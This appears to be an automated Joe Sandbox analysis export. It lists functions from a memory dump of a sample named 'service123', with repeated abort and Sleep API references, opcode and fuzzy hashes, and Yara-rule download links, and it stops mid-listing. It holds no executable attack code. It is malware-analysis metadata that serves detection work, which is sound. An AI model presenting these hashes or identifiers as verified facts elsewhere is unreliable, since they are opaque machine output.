abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D44
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 77b11931abd096bc3338c5977b156239d319a097d063f506d711946b206ded35
Instruction ID: 599a15b8fc70cff4c4c44188542d8ef142f28fc53da74c261c8ba92aa2ed1a88
Opcode Fuzzy Hash: 77b11931abd096bc3338c5977b156239d319a097d063f506d711946b206ded35
Instruction Fuzzy Hash: C4E08C3378A31D4B85106D9CB4814BEF2689B42398F111C28CE68A3E04D342E88D8BC3

Function 6C2FBE00 Relevance: 37.5, APIs: 25, Instructions: 46COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D44
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: f1bdf92fe784dd716450a381fcbe393cc49dbea88f7ca8833756bdcf582f8442
Instruction ID: 01bc13bf48f1a95f21a77b7997a052e2bd67ce16c6e888905f5e798dc07b86d8
Opcode Fuzzy Hash: f1bdf92fe784dd716450a381fcbe393cc49dbea88f7ca8833756bdcf582f8442
Instruction Fuzzy Hash: 84D0A73179D21F8BCB045F2C8099CBDF3F56B46308B5A5C94C485F3E05D621EA4A8F06

Function 6C2FBE70 Relevance: 37.5, APIs: 25, Instructions: 46COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D44
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 2752d643918e1e1032e991af4b8656a5a6dc123bbfd1704150af43cc30d29a6a
Instruction ID: 25ab2e63c7aa21128eb367b2ea670fa7046e932721f0ef363c2f6becacb7e660
Opcode Fuzzy Hash: 2752d643918e1e1032e991af4b8656a5a6dc123bbfd1704150af43cc30d29a6a
Instruction Fuzzy Hash: 7AD0173028970D8F8300EF48D1988A9F7F5AB4A305B019D69C84897B24D632D848CE02

Function 6C2FBDC7 Relevance: 37.5, APIs: 25, Instructions: 44COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D44
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 2018c9856225a1e0aff8a6428b538321e9f063033382905ac13f326accea8504
Instruction ID: c077031bf681d6c90e95843038d4055c265c865c740016cdc803e813b1483e44
Opcode Fuzzy Hash: 2018c9856225a1e0aff8a6428b538321e9f063033382905ac13f326accea8504
Instruction Fuzzy Hash: 73C01222AD931D8BC1102D9C505177AF2A49B07304F522C188D9533E008B52EC498A47

Function 6C2FBE98 Relevance: 37.5, APIs: 25, Instructions: 43COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D44
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: bc52ccfba1c464a848b42941d0ab8aaff6de37609b708ea6479571ad4f8441ac
Instruction ID: 0768c6e81f1531dbe76f74f535c1f5d18e1f1d8baf19655f07652b4392dc30fa
Opcode Fuzzy Hash: bc52ccfba1c464a848b42941d0ab8aaff6de37609b708ea6479571ad4f8441ac
Instruction Fuzzy Hash: AFC0123679931D8B8200AE8890918A9F274AB5B304F412C54CD5173B008761E849CA43

Function 6C2FBDE8 Relevance: 37.5, APIs: 25, Instructions: 42COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D44
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 69f2f5bcc04e92503fe01ced6f102d5792e48c4d85d4df18c058018d50acc486
Instruction ID: 7ddc4a0ba7648a24b59597d14f2e56282344bdfa0229a84c5b3d0e0a0d673fc1
Opcode Fuzzy Hash: 69f2f5bcc04e92503fe01ced6f102d5792e48c4d85d4df18c058018d50acc486
Instruction Fuzzy Hash: 5EC08C32BDC31D8740003D4C1096878F2A40707324F462D14C84033F00CA03D8898A46

Function 6C2FC150 Relevance: 36.3, APIs: 24, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b0fe0e6f13069f2a05d7ec0c6ed9c6692f3af21a425fdd9f8feb84d84408913
Instruction ID: 5f137782c958aeb374aaba6c7bd0208a8e60543a97533b154c3e5084911b30f9
Opcode Fuzzy Hash: 7b0fe0e6f13069f2a05d7ec0c6ed9c6692f3af21a425fdd9f8feb84d84408913
Instruction Fuzzy Hash: 9CB1B271A4834A8FD720DF18C48075AFBF1BF86708F04496DE9A59BB02C375E945CB92

Function 6C2FC470 Relevance: 33.2, APIs: 22, Instructions: 152COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D44
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 823dcffa411acc7a0ba6da02aae05b9d5ffb0405c6cf26622126a40d81ee21cc
Instruction ID: 89948a1d8a8003a7691d409b9a3fb15e4d86e007dff8c6786172cd7897fcfedb
Opcode Fuzzy Hash: 823dcffa411acc7a0ba6da02aae05b9d5ffb0405c6cf26622126a40d81ee21cc
Instruction Fuzzy Hash: C841BDB1A9121D8BCB10CF68C4817A9FBF5BF49714F18846AEC64EF782D33594428B50

Function 6C2FD370 Relevance: 31.6, APIs: 21, Instructions: 130sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 6C2FCD00: strlen.MSVCRT ref: 6C2FCD7D

Sleep.KERNEL32 ref: 6C2FD4D7
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D21
